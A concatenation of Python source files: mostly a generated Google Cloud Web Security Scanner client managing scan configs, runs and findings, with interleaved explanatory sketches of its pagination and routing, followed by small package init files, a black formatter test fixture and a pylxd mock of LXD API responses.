if "list_scan_configs" not in self._inner_api_calls:
self._inner_api_calls[
"list_scan_configs"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_scan_configs,
default_retry=self._method_configs["ListScanConfigs"].retry,
default_timeout=self._method_configs["ListScanConfigs"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListScanConfigsRequest(
parent=parent, page_size=page_size
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_scan_configs"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="scan_configs",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
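The `GRPCIterator` returned above drives pagination by feeding each response's `next_page_token` back into the request's `page_token` until the token comes back empty. A minimal self-contained sketch of that loop, with `fake_list_scan_configs` as a hypothetical stand-in for the real RPC:

```python
# Two canned pages keyed by page token: "" is the first request.
PAGES = {
    "": (["cfg-a", "cfg-b"], "t1"),
    "t1": (["cfg-c"], ""),
}

def fake_list_scan_configs(page_token=""):
    items, next_token = PAGES[page_token]
    return {"scan_configs": items, "next_page_token": next_token}

def iterate_all(method):
    """Yield every item across pages, following next_page_token."""
    token = ""
    while True:
        response = method(page_token=token)
        yield from response["scan_configs"]
        token = response["next_page_token"]
        if not token:
            break

print(list(iterate_all(fake_list_scan_configs)))  # ['cfg-a', 'cfg-b', 'cfg-c']
```

This is why the docstring notes you can iterate elements directly or walk `.pages`: the iterator lazily issues one RPC per page as you consume it.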
def update_scan_config(
self,
scan_config,
update_mask,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
        Updates a ScanConfig. This method supports partial updates of a ScanConfig.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> # TODO: Initialize `scan_config`:
>>> scan_config = {}
>>>
>>> # TODO: Initialize `update_mask`:
>>> update_mask = {}
>>>
>>> response = client.update_scan_config(scan_config, update_mask)
Args:
scan_config (Union[dict, ~google.cloud.websecurityscanner_v1alpha.types.ScanConfig]): Required. The ScanConfig to be updated. The name field must be set to identify the
resource to be updated. The values of fields not covered by the mask
will be ignored.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig`
update_mask (Union[dict, ~google.cloud.websecurityscanner_v1alpha.types.FieldMask]): Required. The update mask applies to the resource. For the ``FieldMask``
definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.websecurityscanner_v1alpha.types.FieldMask`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "update_scan_config" not in self._inner_api_calls:
self._inner_api_calls[
"update_scan_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.update_scan_config,
default_retry=self._method_configs["UpdateScanConfig"].retry,
default_timeout=self._method_configs["UpdateScanConfig"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.UpdateScanConfigRequest(
scan_config=scan_config, update_mask=update_mask
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("scan_config.name", scan_config.name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["update_scan_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def start_scan_run(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Start a ScanRun according to the given ScanConfig.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_config_path('[PROJECT]', '[SCAN_CONFIG]')
>>>
>>> response = client.start_scan_run(name)
Args:
name (str): Required. The resource name of the ScanConfig to be used. The name follows the
format of 'projects/{projectId}/scanConfigs/{scanConfigId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanRun` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "start_scan_run" not in self._inner_api_calls:
self._inner_api_calls[
"start_scan_run"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.start_scan_run,
default_retry=self._method_configs["StartScanRun"].retry,
default_timeout=self._method_configs["StartScanRun"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.StartScanRunRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["start_scan_run"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def get_scan_run(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets a ScanRun.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> response = client.get_scan_run(name)
Args:
name (str): Required. The resource name of the ScanRun to be returned. The name follows the
format of
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanRun` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "get_scan_run" not in self._inner_api_calls:
self._inner_api_calls[
"get_scan_run"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_scan_run,
default_retry=self._method_configs["GetScanRun"].retry,
default_timeout=self._method_configs["GetScanRun"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.GetScanRunRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["get_scan_run"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_scan_runs(
self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Lists ScanRuns under a given ScanConfig, in descending order of ScanRun
stop time.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.scan_config_path('[PROJECT]', '[SCAN_CONFIG]')
>>>
>>> # Iterate over all results
>>> for element in client.list_scan_runs(parent):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_scan_runs(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The parent resource name, which should be a scan resource name in the
format 'projects/{projectId}/scanConfigs/{scanConfigId}'.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanRun` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_scan_runs" not in self._inner_api_calls:
self._inner_api_calls[
"list_scan_runs"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_scan_runs,
default_retry=self._method_configs["ListScanRuns"].retry,
default_timeout=self._method_configs["ListScanRuns"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListScanRunsRequest(
parent=parent, page_size=page_size
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_scan_runs"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="scan_runs",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def stop_scan_run(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Stops a ScanRun. The stopped ScanRun is returned.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> response = client.stop_scan_run(name)
Args:
name (str): Required. The resource name of the ScanRun to be stopped. The name follows the
format of
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanRun` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "stop_scan_run" not in self._inner_api_calls:
self._inner_api_calls[
"stop_scan_run"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.stop_scan_run,
default_retry=self._method_configs["StopScanRun"].retry,
default_timeout=self._method_configs["StopScanRun"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.StopScanRunRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["stop_scan_run"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_crawled_urls(
self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
List CrawledUrls under a given ScanRun.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> # Iterate over all results
>>> for element in client.list_crawled_urls(parent):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_crawled_urls(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The parent resource name, which should be a scan run resource name in the
format
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.websecurityscanner_v1alpha.types.CrawledUrl` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_crawled_urls" not in self._inner_api_calls:
self._inner_api_calls[
"list_crawled_urls"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_crawled_urls,
default_retry=self._method_configs["ListCrawledUrls"].retry,
default_timeout=self._method_configs["ListCrawledUrls"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListCrawledUrlsRequest(
parent=parent, page_size=page_size
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_crawled_urls"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="crawled_urls",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
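# The routing metadata appended above is built by
# google.api_core.gapic_v1.routing_header.to_grpc_metadata, which
# percent-encodes the ("parent", parent) pairs into a single
# x-goog-request-params gRPC metadata entry. A stdlib-only sketch of
# that encoding (the helper name here is illustrative, not the real
# google-api-core API; the header name is the one GAPIC clients use):

```python
from urllib.parse import urlencode


def to_request_params_metadata(params):
    # Percent-encode ("key", "value") pairs into the single
    # x-goog-request-params header used for request routing.
    return ("x-goog-request-params", urlencode(params))


header = to_request_params_metadata(
    [("parent", "projects/my-project/scanConfigs/cfg/scanRuns/run")]
)
```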
def get_finding(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets a Finding.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.finding_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]', '[FINDING]')
>>>
>>> response = client.get_finding(name)
Args:
name (str): Required. The resource name of the Finding to be returned. The name follows the
format of
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}/findings/{findingId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.Finding` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "get_finding" not in self._inner_api_calls:
self._inner_api_calls[
"get_finding"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_finding,
default_retry=self._method_configs["GetFinding"].retry,
default_timeout=self._method_configs["GetFinding"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.GetFindingRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["get_finding"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_findings(
self,
parent,
filter_,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
List Findings under a given ScanRun.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> # TODO: Initialize `filter_`:
>>> filter_ = ''
>>>
>>> # Iterate over all results
>>> for element in client.list_findings(parent, filter_):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_findings(parent, filter_).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The parent resource name, which should be a scan run resource name in the
format
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
filter_ (str): Required. The filter expression. The expression must be in the format:
<field> <operator> <value>.
Supported field: 'finding_type'. Supported operator: '='.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.websecurityscanner_v1alpha.types.Finding` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_findings" not in self._inner_api_calls:
self._inner_api_calls[
"list_findings"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_findings,
default_retry=self._method_configs["ListFindings"].retry,
default_timeout=self._method_configs["ListFindings"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListFindingsRequest(
parent=parent, filter=filter_, page_size=page_size
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_findings"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="findings",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
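# GRPCIterator drives the page loop by copying next_page_token from each
# response into the request's page_token field until the token comes back
# empty. A minimal stdlib sketch of the same token-threading loop (the
# fake two-page response table is illustrative):

```python
def iterate_pages(fetch, request):
    """Yield items across pages, threading the page token through."""
    while True:
        response = fetch(request)
        for item in response["findings"]:
            yield item
        token = response.get("next_page_token", "")
        if not token:
            return
        request = dict(request, page_token=token)


# Two fake pages wired together by the token.
pages = {
    "": {"findings": ["f1", "f2"], "next_page_token": "t1"},
    "t1": {"findings": ["f3"], "next_page_token": ""},
}
items = list(iterate_pages(lambda r: pages[r.get("page_token", "")], {}))
```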
def list_finding_type_stats(
self,
parent,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
List all FindingTypeStats under a given ScanRun.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> response = client.list_finding_type_stats(parent)
Args:
parent (str): Required. The parent resource name, which should be a scan run resource name in the
format
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ListFindingTypeStatsResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_finding_type_stats" not in self._inner_api_calls:
self._inner_api_calls[
"list_finding_type_stats"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_finding_type_stats,
default_retry=self._method_configs["ListFindingTypeStats"].retry,
default_timeout=self._method_configs["ListFindingTypeStats"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListFindingTypeStatsRequest(parent=parent)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["list_finding_type_stats"](
request, retry=retry, timeout=timeout, metadata=metadata
)
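# Each method above lazily wraps its transport callable exactly once and
# caches the result in _inner_api_calls; later calls reuse the cached
# wrapper. A stripped-down sketch of that memoization pattern (the class
# and _wrap stand-in are illustrative, not the google-api-core API):

```python
class Client:
    def __init__(self):
        self._inner_api_calls = {}
        self.wrap_count = 0

    def _wrap(self, func):
        # Stands in for google.api_core.gapic_v1.method.wrap_method,
        # which layers retry/timeout defaults over the transport call.
        self.wrap_count += 1
        return func

    def call(self, name, func, *args):
        if name not in self._inner_api_calls:
            self._inner_api_calls[name] = self._wrap(func)
        return self._inner_api_calls[name](*args)


client = Client()
client.call("get_finding", lambda x: x, 1)
client.call("get_finding", lambda x: x, 2)
```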

# tweet_classifier/layers/__init__.py (amr-amr/CrisisTweetMap, MIT)
from .cos_classification_layer import *
from .l2_classification_layer import *

# devind_dictionaries/tasks/__init__.py (devind-team/devind-django-dictionaries, MIT)
"""Background for async tasks."""
from .update_organizations import update_organizations

# ddop/newsvendor/__init__.py (AndreasPhilippi/Package, BSD-3-Clause)
from ._SampleAverageApproximationNewsvendor import SampleAverageApproximationNewsvendor
from ._WeightedNewsvendor import DecisionTreeWeightedNewsvendor, RandomForestWeightedNewsvendor, \
KNeighborsWeightedNewsvendor, GaussianWeightedNewsvendor
from ._LinearRegressionNewsvendor import LinearRegressionNewsvendor
from ._DeepLearningNewsvendor import DeepLearningNewsvendor
__all__ = ["SampleAverageApproximationNewsvendor", "DecisionTreeWeightedNewsvendor",
"RandomForestWeightedNewsvendor", "KNeighborsWeightedNewsvendor",
"GaussianWeightedNewsvendor", "LinearRegressionNewsvendor",
"DeepLearningNewsvendor"]

# tests/data/cantfit.py (joshbode/black, MIT)
# long variable name
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = 0
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = 1 # with a comment
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = [
1, 2, 3
]
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function()
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function(
arg1, arg2, arg3
)
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function(
[1, 2, 3], arg1, [1, 2, 3], arg2, [1, 2, 3], arg3
)
# long function name
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying()
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying(
arg1, arg2, arg3
)
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying(
[1, 2, 3], arg1, [1, 2, 3], arg2, [1, 2, 3], arg3
)
# long arguments
normal_name = normal_function_name(
"but with super long string arguments that on their own exceed the line limit so there's no way it can ever fit",
"eggs with spam and eggs and spam with eggs with spam and eggs and spam with eggs with spam and eggs and spam with eggs",
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it=0,
)
string_variable_name = (
"a string that is waaaaaaaayyyyyyyy too long, even in parens, there's nothing you can do" # noqa
)
for key in """
hostname
port
username
""".split():
if key in self.connect_kwargs:
raise ValueError(err.format(key))
concatenated_strings = "some strings that are" "concatenated implicitly, so if you put them on separate" "lines it will fit"
del concatenated_strings, string_variable_name, normal_function_name, normal_name, need_more_to_make_the_line_long_enough
# output
# long variable name
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = (
0
)
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = (
1
) # with a comment
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = [
1,
2,
3,
]
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = (
function()
)
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function(
arg1, arg2, arg3
)
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function(
[1, 2, 3], arg1, [1, 2, 3], arg2, [1, 2, 3], arg3
)
# long function name
normal_name = (
but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying()
)
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying(
arg1, arg2, arg3
)
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying(
[1, 2, 3], arg1, [1, 2, 3], arg2, [1, 2, 3], arg3
)
# long arguments
normal_name = normal_function_name(
"but with super long string arguments that on their own exceed the line limit so there's no way it can ever fit",
"eggs with spam and eggs and spam with eggs with spam and eggs and spam with eggs with spam and eggs and spam with eggs",
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it=0,
)
string_variable_name = "a string that is waaaaaaaayyyyyyyy too long, even in parens, there's nothing you can do" # noqa
for key in """
hostname
port
username
""".split():
if key in self.connect_kwargs:
raise ValueError(err.format(key))
concatenated_strings = (
"some strings that are"
"concatenated implicitly, so if you put them on separate"
"lines it will fit"
)
del (
concatenated_strings,
string_variable_name,
normal_function_name,
normal_name,
need_more_to_make_the_line_long_enough,
)

# mvdnet/config/__init__.py (qiank10/MVDNet, Apache-2.0)
from .config import get_mvdnet_cfg_defaults

# pylxd/tests/mock_lxd.py (simondeziel/pylxd, Apache-2.0)
import json


def instances_POST(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)


def instance_POST(request, context):
context.status_code = 202
if not request.json().get("migration", False):
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
else:
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
"metadata": {
"metadata": {
"0": "abc",
"1": "def",
"control": "ghi",
}
},
}


def instance_PUT(request, context):
context.status_code = 202
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}


def instance_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)


def images_POST(request, context):
context.status_code = 202
return json.dumps(
{
"type": "async",
"operation": "/1.0/operations/images-create-operation?project=default",
}
)


def image_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)


def networks_GET(request, _):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"config": {
"ipv4.address": "10.80.100.1/24",
"ipv4.nat": "true",
"ipv6.address": "none",
"ipv6.nat": "false",
},
"name": name,
"description": "Network description",
"type": "bridge",
"managed": True,
"used_by": [],
},
}
)


def networks_POST(_, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})


def networks_DELETE(_, context):
